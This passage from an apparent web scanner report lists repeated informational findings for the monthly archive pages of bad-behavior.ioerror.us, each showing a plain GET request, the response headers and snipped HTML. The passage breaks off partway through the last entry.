<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.134. http://bad-behavior.ioerror.us/2006/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/01/

Request

GET /2006/01/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762135+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 10774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.135. http://bad-behavior.ioerror.us/2006/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/02/

Request

GET /2006/02/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762134+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.136. http://bad-behavior.ioerror.us/2006/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/03/

Request

GET /2006/03/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762134+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.137. http://bad-behavior.ioerror.us/2006/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/04/

Request

GET /2006/04/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762129+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 33391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.138. http://bad-behavior.ioerror.us/2006/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/05/

Request

GET /2006/05/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762126+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 12709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.139. http://bad-behavior.ioerror.us/2006/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/06/

Request

GET /2006/06/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762124+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.140. http://bad-behavior.ioerror.us/2006/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/07/

Request

GET /2006/07/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762124+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 52882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.141. http://bad-behavior.ioerror.us/2006/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/08/

Request

GET /2006/08/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762120+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 24584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.142. http://bad-behavior.ioerror.us/2006/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/09/

Request

GET /2006/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762120+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 26879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.143. http://bad-behavior.ioerror.us/2006/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/11/

Request

GET /2006/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762120+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 18338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.144. http://bad-behavior.ioerror.us/2006/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2006/12/

Request

GET /2006/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762119+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 28614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.145. http://bad-behavior.ioerror.us/2007/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2007/01/

Request

GET /2007/01/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762118+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.146. http://bad-behavior.ioerror.us/2007/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2007/04/

Request

GET /2007/04/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762118+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 15482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.147. http://bad-behavior.ioerror.us/2007/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2007/12/

Request

GET /2007/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762118+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 18356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.148. http://bad-behavior.ioerror.us/2008/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/01/

Request

GET /2008/01/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762118+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.149. http://bad-behavior.ioerror.us/2008/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/02/

Request

GET /2008/02/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762117+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 11023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.150. http://bad-behavior.ioerror.us/2008/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/04/

Request

GET /2008/04/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762117+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.151. http://bad-behavior.ioerror.us/2008/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/05/

Request

GET /2008/05/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762116+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 14743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.152. http://bad-behavior.ioerror.us/2008/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/07/

Request

GET /2008/07/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762116+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 33344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.153. http://bad-behavior.ioerror.us/2008/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/08/

Request

GET /2008/08/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762116+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 25964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.154. http://bad-behavior.ioerror.us/2008/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/09/

Request

GET /2008/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762114+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.155. http://bad-behavior.ioerror.us/2008/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/11/

Request

GET /2008/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762114+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 13933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.156. http://bad-behavior.ioerror.us/2008/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2008/12/

Request

GET /2008/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762112+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.157. http://bad-behavior.ioerror.us/2009/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2009/02/

Request

GET /2009/02/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762112+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 14223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.158. http://bad-behavior.ioerror.us/2009/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2009/06/

Request

GET /2009/06/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762112+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 19596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.159. http://bad-behavior.ioerror.us/2009/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2009/09/

Request

GET /2009/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762110+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.160. http://bad-behavior.ioerror.us/2009/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2009/10/

Request

GET /2009/10/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762110+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.161. http://bad-behavior.ioerror.us/2009/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2009/11/

Request

GET /2009/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
